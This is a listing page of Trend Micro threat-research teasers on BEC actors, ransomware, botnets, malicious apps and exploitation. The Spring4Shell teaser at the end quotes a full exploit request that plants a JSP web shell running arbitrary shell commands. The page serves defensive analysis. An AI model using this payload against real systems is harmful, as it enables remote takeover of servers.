Trend Micro Partners With Interpol and Nigeria EFCC for Operation Killer Bee, Takes Down Nigerian BEC Actors

It starts with the malicious actors scraping the internet for public sites containing email addresses, which will be stored in a text file. They also use tools such as Lite Email Extractor to scrape email addresses. To expand their range of targets the malicious actors also search for specific keywords in Google, such as “LTD PLC” and “manufacturing suppliers.” After obtaining their list of targets, they may share this information with other malicious actors via…

New Linux-Based Ransomware Cheerscrypt Targets ESXi Devices

Category: Ransomware
Trend Micro Research detected “Cheerscrypt”, a new Linux-based ransomware variant that compromises ESXi servers. We discuss our initial findings in this report.
By: Arianne Dela Cruz, Byron Gelera, McJustine De Guzman, Warren Sto.Tomas, May 25, 2022

We recently observed multiple Linux-based ransomware detections that malicious actors launched to target VMware ESXi servers, a bare-metal hypervisor for creating and running several virtual machines (VMs)…

Bruised but Not Broken: The Resurgence of the Emotet Botnet Malware

The Emotet botnet malware is well known in the cybersecurity industry for its success in using spam emails to compromise machines and then selling access to these machines as part of its infamous malware-as-a-service (MaaS) scheme. Operators behind notorious threats such as the Trickbot trojan and the Ryuk or Conti ransomware are among the malicious actors who have used the botnet malware in their attacks. But in January 2021 came news of Emotet’s dismantling, dubbed…

Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR

Trend Micro’s Managed XDR team addressed a Kingminer botnet attack conducted through an SQL exploit. We discuss our findings and analysis in this report.
By: Buddy Tancio, Jed Valderama, May 18, 2022

We observed malicious activities in a client’s SQL server that flagged a potential exploit in one public-facing device. A quick look at the Trend Micro Vision One™ Workbench showed…

Fake Mobile Apps Steal Facebook Credentials, Cryptocurrency-Related Keys

Category: Mobile
We recently observed a number of apps on Google Play designed to perform malicious activities such as stealing user credentials and other sensitive user information, including private keys.
By: Cifer Fang, Ford Quin, Zhengyu Dong, May 16, 2022

Examining the Black Basta Ransomware’s Infection Routine

Category: Ransomware
We analyze the Black Basta ransomware and examine the malicious actor’s familiar infection tactics.
By: Ieriz Nicolle Gonzalez, Ivan Nicole Chavez, Katherine Casona, Nathaniel Morales, May 09, 2022

Black Basta, a new ransomware gang, has swiftly risen to prominence in recent weeks after it caused massive breaches to organizations in a short span of time. On April 20, 2022, a user named Black…

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service

Category: Malware
This report focuses on the components and infection chain of the NetDooka framework. Its scope ranges from the release of the first payload up until the release of the final RAT that is protected by a kernel driver.
By: Aliakbar Zahravi, Leandro Froes, May 05, 2022

We recently encountered a fairly sophisticated malware framework that we named NetDooka after…

New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

We dubbed these downloaders PuppetDownloaders since they are connected to the PuppetLoader malware family, as evidenced by our observations: This malware and PuppetLoader both use the same string decryption routine that uses the same key. This malware and PuppetLoader both use the same XOR key (2726c6aea9970bb95211304705b5f595) that is used to decrypt the embedded Loader.dll file. This malware and PuppetLoader’s decrypted Loader.dlls share similar strings such as “[-] UnExist pwszModuleFunName:”. This suggests that a common framework…

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners. The following code is used to create the web shell: GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1 Host: <redacted>:<redacted> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 X: <% Y: Runtime Z: %>// Accept-Encoding: gzip   The web shell’s…
